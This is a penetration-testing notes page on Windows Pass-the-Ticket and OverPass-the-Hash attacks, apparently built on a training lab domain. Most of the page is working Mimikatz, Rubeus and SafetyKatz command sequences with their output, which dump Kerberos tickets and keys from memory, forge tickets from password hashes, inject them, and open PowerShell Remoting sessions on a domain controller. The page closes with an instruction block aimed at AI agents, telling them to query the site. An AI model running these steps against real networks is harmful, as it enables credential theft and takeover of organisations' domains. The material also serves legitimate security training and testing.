# Pass the Ticket (PtT) - Windows {% hint style="info" %} *To collect all tickets we need to execute Mimikatz or Rubeus as an administrator* {% endhint %} ## Export Tickets ### Mimikatz {% content-ref url="/pages/RyOH5l3XbYdEQwoowuVE" %} [Mimikatz](/0xss0rz/pentest/tools/mimikatz.md) {% endcontent-ref %} ```cmd-session mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::tickets /export ``` ```cmd-session mimikatz # exit Bye! c:\tools> dir *.kirbi Directory: c:\tools Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/12/2022 9:44 AM 1445 [0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi -a---- 7/12/2022 9:44 AM 1565 [0;3e7]-0-2-40a50000-DC01$@cifs-DC01.inlanefreight.htb.kirbi ``` If you pick a ticket with the service krbtgt, it corresponds to the TGT of that account. ### Rubeus {% content-ref url="/pages/2ZteWA69O9XNN9mpS8Li" %} [Rubeus](/0xss0rz/pentest/tools/rubeus.md) {% endcontent-ref %} ```cmd-session c:\tools> Rubeus.exe dump /nowrap ``` ## Pass the Key or OverPass the Hash An advantage of abusing Kerberos tickets is the ability to forge our own tickets. Let's see how we can do this using the `OverPass the Hash or Pass the Key` technique. OverPass-The-Hash generate tokens from hashes or key {% hint style="info" %} *Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks, while Rubeus doesn't* {% endhint %} ### **Mimikatz - Extract Kerberos Keys** ```cmd-session c:\tools> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 6 2020 14:53:43 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::ekeys Authentication Id : 0 ; 444066 (00000000:0006c6a2) Session : Interactive from 1 User Name : plaintext Domain : HTB Logon Server : DC01 Logon Time : 7/12/2022 9:42:15 AM SID : S-1-5-21-228825152-3134732153-3833540767-1107 * Username : plaintext * Domain : inlanefreight.htb * Password : (null) * Key List : aes256_hmac b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 rc4_hmac_nt 3f74aa8f08f712f09cd5177b5c1ce50f rc4_hmac_old 3f74aa8f08f712f09cd5177b5c1ce50f rc4_md4 3f74aa8f08f712f09cd5177b5c1ce50f rc4_hmac_nt_exp 3f74aa8f08f712f09cd5177b5c1ce50f rc4_hmac_old_exp 3f74aa8f08f712f09cd5177b5c1ce50f ``` Then Pass the Key or OverPass the Hash ### **Mimikatz - Pass the Key or OverPass the Hash** ```cmd-session c:\tools> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 6 2020 14:53:43 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f user : plaintext domain : inlanefreight.htb program : cmd.exe impers. : no NTLM : 3f74aa8f08f712f09cd5177b5c1ce50f | PID 1128 | TID 3268 | LSA Process is now R/W | LUID 0 ; 3414364 (00000000:0034195c) \_ msv1_0 - data copy @ 000001C7DBC0B630 : OK ! \_ kerberos - data copy @ 000001C7E20EE578 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000001C7E2136BC8 (32) -> null ``` ### **Invoke-Mimikatz** ```powershell Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:" /run:powershell.exe"' ``` ### **SafetyKatz** ``` SafetyKatz.exe "sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:" /run:cmd.exe" "exit" ``` ### **Rubeus - Pass the Key or OverPass the Hash** No need elevation ``` Rubeus.exe asktgt /user:administrator /rc4: /ptt ``` ```cmd-session c:\tools> Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Ask TGT [*] Using rc4_hmac hash: 3f74aa8f08f712f09cd5177b5c1ce50f [*] Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\plaintext' [+] TGT request successful! [*] base64(ticket.kirbi): doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpY8Kcp4i71zFcWRgpx8ovymu3HmbOL4MJVCfkGIrdJEO0iPQbMRY2pzSrk/gHuER2XRLdV/LSsa2xrdJJir1eVugDFCoGFT2hDcYcpRdifXw67WofDM6Z6utsha+4bL0z6QN+tdpPlNQFwjuWmBrZtpS9TcCblotYvDHa0aLVsroW/fqXJ4KIV2tVfbVIDJvPkgdNAbhp6NvlbzeakR1oO5RTm7wtRXeTirfo6C9Ap0HnctlHAd+Qnvo2jGUPP6GHIhdlaM+QShdJtzBEeY/xIrORiiylYcBvOoir8mFEzNpQgYADmbTmg+c7/NgNO8Qj4AjrbGjVf/QWLlGc7sH9+tARi/Gn0cGKDK481A0zz+9C5huC9ZoNJ/18rWfJEb4P2kjlgDI0/fauT5xN+3NlmFVv0FSC8/909pUnovy1KkQaMgXkbFjlxeheoPrP6S/TrEQ8xKMyrz9jqs3ENh//q738lxSo8J2rZmv1QHy+wmUKif4DUwPyb4AHgSgCCUUppIFB3UeKjqB5srqHR78YeAWgY7pgqKpKkEomy922BtNprk2iLV1cM0trZGSk6XJ/H+JuLHI5DkuhkjZQbb1kpMA2CAFkEwdL9zkfrsrdIBpwtaki8pvcBPOzAjXzB7MWvhyAQevHCT9y6iDEEvV7fsF/B5xHXiw3Ur3P0xuCS4K/Nf4GC5PIahivW3jkDWn3g/0nl1K9YYX7cfgXQH9/inPS0OF1doslQfT0VUHTzx8vG3H25vtc2mPrfIwfUzmReLuZH8GCvt4p2BAbHLKx6j/HPa4+YPmV0GyCv9iICucSwdNXK53Q8tPjpjROha4AGjaK50yY8lgknRA4dYl7+O2+j4K/lBWZHy+IPgt3TO7YFoPJIEuHtARqigF5UzG1S+mefTmqpuHmoq72KtidINHqi+GvsvALbmSBQaRUXsJW/Lf17WXNXmjeeQWemTxlysFs1uRw9JlPYsGkXFh3fQ2ngax7JrKiO1/zDNf6cvRpuygQRHMOo5bnWgB2E7hVmXm2BTimE7axWcmopbIkEi165VOy/M+pagrzZDLTiLQOP/X8D6G35+srSr4YBWX4524/Nx7rPFCggxIXEU4zq3Ln1KMT9H7efDh+h0yNSXMVqBSCZLx6h3Fm2vNPRDdDrq7uz5UbgqFoR2tgvEOSpeBG5twl4MSh6VA7LwFi2usqqXzuPgqySjA1nPuvfy0Nd14GrJFWo6eDWoOy2ruhAYtaAtYC6OByDCBxaADAgEAooG9BIG6fYG3MIG0oIGxMIGuMIGroBswGaADAgEXoRIEENEzis1B3YAUCjJPPsZjlduhCRsHSFRCLkNPTaIWMBSgAwIBAaENMAsbCXBsYWludGV4dKMHAwUAQOEAAKURGA8yMDIyMDcxMjE1MjgyNlqmERgPMjAyMjA3MTMwMTI4MjZapxEYDzIwMjIwNzE5MTUyODI2WqgJGwdIVEIuQ09NqRwwGqADAgECoRMwERsGa3JidGd0GwdodGIuY29t ServiceName : krbtgt/inlanefreight.htb ServiceRealm : inlanefreight.htb UserName : plaintext UserRealm : inlanefreight.htb StartTime : 7/12/2022 11:28:26 AM EndTime : 7/12/2022 9:28:26 PM RenewTill : 7/19/2022 11:28:26 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : 0TOKzUHdgBQKMk8+xmOV2w== ``` Need elevation ``` Rubeus.exe asktgt /user:administrator /aes256: /opsec /createonly:C:\Windows\System32.cmd.exe /show /ptt ``` ## Pass The Ticket ### **Rubeus** * All in one ```cmd-session c:\tools> Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt ``` * Import .kirbi ```cmd-session c:\tools> Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi ``` * Base64 We can also use the base64 output from Rubeus or convert a .kirbi to base64 to perform the Pass the Ticket attack. We can use PowerShell to convert a .kirbi to base64. ```powershell-session PS c:\tools> [Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi")) doQAAAWfMIQAAAWZoIQAAAADAgEFoYQAAAADAgEWooQAAAQ5MIQAAAQzY .. SNIP .. ``` ```cmd-session c:\tools> Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpY8Kcp4i71zFcWRgpx8ovymu3HmbOL4MJVCfkGIrdJEO0iPQbMRY2pzSrk/gHuER2XRLdV/ ______ _ ``` ### **Mimikatz** ```cmd-session C:\tools> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 6 2020 14:53:43 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # kerberos::ptt "C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi" * File: 'C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi': OK mimikatz # exit Bye! c:\tools> dir \\DC01.inlanefreight.htb\c$ Directory: \\dc01.inlanefreight.htb\c$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 6/4/2022 11:17 AM Program Files d----- 6/4/2022 11:17 AM Program Files (x86) ``` We can use the Mimikatz module `misc` to launch a new command prompt window with the imported ticket using the `misc::cmd` command ### PowerShell Remoting {% hint style="info" %} *To create a PowerShell Remoting session on a remote computer, you must have administrative permissions, be a member of the **Remote Management Users group**, or have explicit PowerShell Remoting permissions in your session configuration.* {% endhint %} Suppose we find a user account that doesn't have administrative privileges on a remote computer but is a member of the Remote Management Users group. In that case, we can use PowerShell Remoting to connect to that computer and execute commands. {% content-ref url="/pages/L75HCvqkQh2kHKU5XR8o" %} [WinRM (5985, 5986)](/0xss0rz/pentest/protocols/winrm-5985-5986.md) {% endcontent-ref %} * Mimikatz ```cmd-session C:\tools> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi" * File: 'C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi': OK mimikatz # exit Bye! c:\tools>powershell Windows PowerShell Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\tools> Enter-PSSession -ComputerName DC01 [DC01]: PS C:\Users\john\Documents> whoami inlanefreight\john [DC01]: PS C:\Users\john\Documents> hostname DC01 [DC01]: PS C:\Users\john\Documents> ``` * Rubeus ```cmd-session C:\tools> Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.0.3 [*] Action: Create process (/netonly) [*] Using random username and password. [*] Showing process : True [*] Username : JMI8CL7C [*] Domain : DTCDV6VL [*] Password : MRWI6XGI [+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9 [+] ProcessID : 1556 [+] LUID : 0xe07648 ``` The above command will open a new cmd window. From that window, we can execute Rubeus to request a new TGT with the option `/ptt` to import the ticket into our current session and connect to the DC using PowerShell Remoting. ```cmd-session C:\tools> Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.0.3 [*] Action: Ask TGT [*] Using aes256_cts_hmac_sha1 hash: 9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc [*] Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\john' [*] Using domain controller: 10.129.203.120:88 [+] TGT request successful! [*] base64(ticket.kirbi): doIFqDCCBaSgAwIBBaEDAgEWooIEojCCBJ5hggSaMIIElqADAgEFoRMbEUlOTEFORUZSRUlHSFQuSFRC ... SNIP ... MDcyNTEyNDQ1MFqoExsRSU5MQU5FRlJFSUdIVC5IVEKpJjAkoAMCAQKhHTAbGwZrcmJ0Z3QbEWlubGFu ZWZyZWlnaHQuaHRi [+] Ticket successfully imported! ServiceName : krbtgt/inlanefreight.htb ServiceRealm : INLANEFREIGHT.HTB UserName : john UserRealm : INLANEFREIGHT.HTB StartTime : 7/18/2022 5:44:50 AM EndTime : 7/18/2022 3:44:50 PM RenewTill : 7/25/2022 5:44:50 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : 5VdAaevnpxx/f9rXsDDLfK6tH+4qQ3f1GlOB1ClBWh0= ASREP (key) : 9279BCBD40DB957A0ED0D3856B2E67F9BB58E6DC7FC07207D0763CE2713F11DC c:\tools>powershell Windows PowerShell Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\tools> Enter-PSSession -ComputerName DC01 [DC01]: PS C:\Users\john\Documents> whoami inlanefreight\john [DC01]: PS C:\Users\john\Documents> hostname DC01 ``` ## Resources {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-ticket-ptt-windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.